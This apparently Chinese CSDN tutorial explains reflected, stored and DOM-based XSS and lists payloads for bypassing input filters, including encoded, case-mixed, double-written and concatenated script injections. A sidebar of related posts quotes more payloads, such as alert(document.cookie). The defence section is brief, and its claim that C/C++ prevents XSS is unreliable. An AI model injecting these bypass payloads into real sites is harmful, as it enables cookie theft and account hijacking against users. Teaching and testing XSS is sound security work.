XSS的产生,利用与防御

最新推荐文章于 2022-08-02 08:56:20 发布
最新推荐文章于 2022-08-02 08:56:20 发布
阅读量3.8k 收藏 3
点赞数 3
文章标签: xss web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50758777/article/details/122300331
版权

XSS的产生,利用与防御

本文部分参考:

https://www.jianshu.com/p/4fcb4b411a66

XSS漏洞常年位列OWASP TOP10。属于web应用程序中常见的一种漏洞。

二:XSS漏洞的分类。XSS漏洞分为存储型,反射性和DOM型。

XSS漏洞的简介:跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。
常见的输出函数有:

echo printf print print_r sprintf die var-dump var_export

XSS的危害:

1.窃取管理员帐号或Cookie,入侵者可以冒充管理员的身份登录后台。使得入侵者具有恶意操纵后台数据的能力,包括读取、更改、添加、删除一些信息。

2.窃取用户的个人信息或者登录帐号,对网站的用户安全产生巨大的威胁。例如冒充用户身份进行各种操作。

3.网站挂马。先将恶意攻击代码嵌入到Web应用程序之中。当用户浏览该挂马页面时,用户的计算机会被植入木马。

4.发送广告或者垃圾信息。攻击者可以利用XSS漏洞植入广告,或者发送垃圾信息,严重影响到用户的正常使用。例如当年的微博xss蠕虫,参考:

https://www.cnblogs.com/yjf512/archive/2012/03/08/2385093.html

反射型:反射型跨站脚本(Reflected Cross-Site Scripting)是最常见,也是使用最广的一种,可将恶意脚本附加到 URL 地址的参数中。 反射型 XSS 的利用一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代码的 URL,当受害者点击这些专门设计的链接的时候,恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方,常用来窃取客户端 Cookies 或进行钓鱼欺骗。(只要是有框的地方就可能存在反射型漏洞)

存储型(Persistent Cross-Site Scripting)也等同于存储型跨站脚本(Stored Cross-Site Scripting)。

此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本,攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。
持久型 XSS 一般出现在网站留言、评论、博客日志等交互处,恶意脚本存储到客户端或者服务端的数据库中。
DOM型:
DOM-basedXSS漏洞是基于文档对象模型(Document Object Model)的一种漏洞。这种XSS与反射型XSS、持久型XSS在原理上有本质区别,它的攻击代码并不需要服务器解析响应,触发XSS靠的是浏览器端的DOM解析。客户端上的JavaScript脚本可以访问浏览器的DOM并修改页面的内容,不依赖服务器的数据,直接从浏览器端获取数据并执行。
在客户端直接输出DOM内容的时候极易触发DOM型XSS漏洞,如
document.getElementByld(“x’).innerHTML、document.write)等。
(小声逼逼:DOM型我是真的不熟,上面解释参考):

https://blog.csdn.net/lay_loge/article/details/90440207
最常用的一条语句:

<script>alert("XSS")</script>

如果语句没有被执行或者显示错误,说明网站可能对字符进行了过滤,我们这时候需要进行绕过。

常见的绕过方式:编码绕过,大小写绕过,双写绕过,字符拼接,过滤空格,字符混淆绕过。

编码绕过,由于实在是有点多,这里就拿url编码绕过和base64绕过做演示

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">

大小写绕过:

<ImG sRc=x onerRor=alert("xss");>

双写绕过:

<imimgg srsrcc=x onerror=alert("xss");>

字符拼接绕过:

<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">

过滤空格绕过:


```cpp
<img/src="x"/onerror=alert("xss");>


字符混淆绕过:

1.<<script>alert("xss");//<</script>
2.<title><img src=</title>><img src=x onerror="alert(`xss`);"> //因为title标签的优先级比img的高,所以会先闭合title,从而导致前面的img标签无效
3.<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

 

 XSS漏洞的防御:

 1.对输入内容的特定字符进行编码,例如表示 html标记的 < > 等符号

2.使用强语言,例如java、.NET、C/C++。

 3.使用HTTP头指定类型
送终
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
web安全---XSS的形成原理
qq_43072166的博客
08-27 846
xss 的中文名是——-跨站脚本攻击,英文名——–Cross Site Scripting; xss也是一种注入攻击,当web应用对用户输入过滤不严谨时,攻击者写入恶意的脚本代码到网页中,如果用户访问了含有恶意代码的网页,恶意脚本就会被浏览器解析执行并导致用户被攻击。 常见的危害包括:cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。...
Xss原理及攻防解析(简单明了)
qq_41565526的博客
04-04 903
介绍 Xss被称作是跨站脚本攻击,类似于sql注入一样,攻击者在执行Xss时将恶意的脚本代码注入到网页中,当其他正常用户访问该网页时,恶意脚本就会被浏览器解析,危害用户安全。导致用户面临cookie窃取,session劫持等诸多危险。 反射型Xss 反射型的Xss的主要形成原因在于后端服务器在解析用户输入的数据时,将用户输入的数据解析为脚本数据,传递回浏览器后浏览器解析时当作脚本进行解析,触发Xs...
什么是XSS攻击&XSS攻击应用场景
Leon_Jinhai_Sun的博客
10-23 1242
XSS攻击 什么是XSS攻击手段 XSS攻击使用Javascript脚本注入进行攻击 例如在提交表单后,展示到另一个页面,可能会受到XSS脚本注入,读取本地cookie远程发送给黑客服务器端。 <script>alert('sss')</script> <script>window.location.href='http://www.learn....
XSS基础知识
AmyBaby00的博客
09-29 718
XSS原理 XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的。现在让我们来普及一下XSS的一些常识 XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。 它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。 在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制。 XSS攻击的主要目的则是,想办法获取
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss是攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
xsstry:xss漏洞利用平台
06-10
"xsstry"是一个用于XSS漏洞测试和利用的平台,帮助安全研究人员和Web开发者识别并防御这类漏洞。通过这个平台,我们可以深入了解XSS攻击的各种类型,如反射型、存储型和DOM型XSS,并学习如何有效地防止它们。 ### ...
利用Express模拟web安全之---xss的攻与防
01-26
攻击者利用XSS漏洞向网页中插入恶意的JavaScript代码,当用户访问这些被篡改的页面时,恶意脚本会执行,从而对用户的安全造成威胁。XSS攻击的危害广泛,包括盗取用户账号、控制企业数据、盗窃敏感信息、强制发送邮件...
xss平台源码
09-28
"xss平台源码"的提供,对于学习XSS攻击与防御、进行渗透测试以及提升网站安全性具有重要意义。 **一、XSS攻击原理** XSS攻击的核心在于利用网站的不安全输入处理,使得攻击者可以在用户的浏览器中执行恶意...
xss语句构造.docx
01-02
"XSS 语句构造详解" XSS(Cross-Site Scripting)是一种常见的Web应用安全漏洞,攻击者可以通过构造恶意的HTML/JS代码来攻击网站用户。...同时,防御XSS攻击也需要网站开发者和管理员具备一定的安全知识和经验。
XSS跨站攻击课程.pdf
01-25
### XSS跨站攻击课程知识点详解 #### 一、XSS基本原理 ...通过以上知识点的学习,我们可以了解到XSS攻击的基本原理、分类、挖掘方法、利用技巧以及防御策略,这对于保护Web应用免受XSS攻击至关重要。
XSS漏洞】浅析XSS脚本注入点
Monsterlz123的博客
05-23 3786
Hello,各位小伙伴,依旧是晚上好~~ 今天跟大家分享的课题是,当我们进行XSS脚本注入时,在不同的注入点进行注入,会产生不同的结果,那么这到底是为什么呢? 且听我细细道来~ ----------------------------------------------------------------------------------------------------...
初识xss
最新发布
weixin_64183637的博客
08-02 399
初步了解xss
XSS(跨站脚本攻击)详解
热门推荐
谢公子的博客
09-08 7万+
目录 XSS的原理和分类 XSS的攻击载荷 XSS可以插在哪里? XSS漏洞的挖掘 XSS的攻击过程 XSS漏洞的危害 XSS漏洞的简单攻击测试 反射型XSS: 存储型XSS: DOM型XSSXSS的简单过滤和绕过 ​XSS防御 反射型XSS利用姿势 get型 post型 利用JS将用户信息发送给后台 XSS的原理和分类 跨站脚本攻击XSS(Cros...
XSS大全
weixin_46601374的博客
03-01 8224
XSS的原理和特性 xss:将用户的输入当作前端代码执行 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 html:定义了网页的结构 css:美化页面 js:可以操浏览器 XSS主要拼接的是什么 SQL注入拼接的是操作数据库的SQL语句。 XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML) xss
XSS常见的触发标签
LYJ20010728的博客
05-06 1万+
无过滤情况 <script> <scirpt>alert("xss");</script> <img> 图片加载错误时触发 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss')")> 鼠标指针移动到元素时触发 <img src=1 onmouseover="alert(1)"> 鼠标指针移出时触发 <img src=1 onm
html标题%3ctitle%3e,XSS跨站测试代码大全
weixin_39612896的博客
06-18 1508
1 ‘>alert(document.cookie)2 =‘>alert(document.cookie)3 alert(document.cookie)4 alert(vulnerable)5 %3Cscript%3Ealert(‘XSS‘)%3C/script%3E6 alert(‘XSS‘)7 8 %0a%0aalert(\"Vulnerable\").jsp9 %22%3csc...
XSS常用标签
weixin_47306547的博客
09-17 2975
目录 XSS常用标签 < script> < img > < input > < details> < svg > < select > < iframe > < video> < audio > < body > XSS常用标签 <script> alert("xss"); </script> <img src=1 one...
xss其他标签下的js用法总结
lowerxiaoshen的博客
10-30 2156
xss其他标签下的js用法总结大全<script src=js地址></script>实际上我们的测试语句可能为↓<script>alert("90sec")</script>也就是说js语句实际上是位于↓ <script></script>的中间。包括<img>、<input>、<object>、<iframe>、<a></a>、<svg>、标签等情况下的xss构造。所以我们就需要了解各种标签下
xss攻击总结
hw1287789687的专栏
07-15 1544
xss攻击总结 原则用户输入什么,数据库就存储什么. 在前端显示时,需要escape.html标签的title属性也需要escape看一个title属性未escape得例子: html代码: 所以html标签的title属性也需要escape. 但是,如果使用jQuery的attr方法设置title,则不需要escape:setPreviewOrgFullName:function
Web安全漏洞详解:XSS攻击与防御策略
"该PPT详细介绍了Web安全领域常见的安全漏洞,特别是XSS跨站脚本攻击,包括其原理、分类、危害以及防御措施。它适用于教育和培训,旨在提高人们对网络安全的认识。" Web安全是保护网站和网络应用免受非法攻击的关键...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值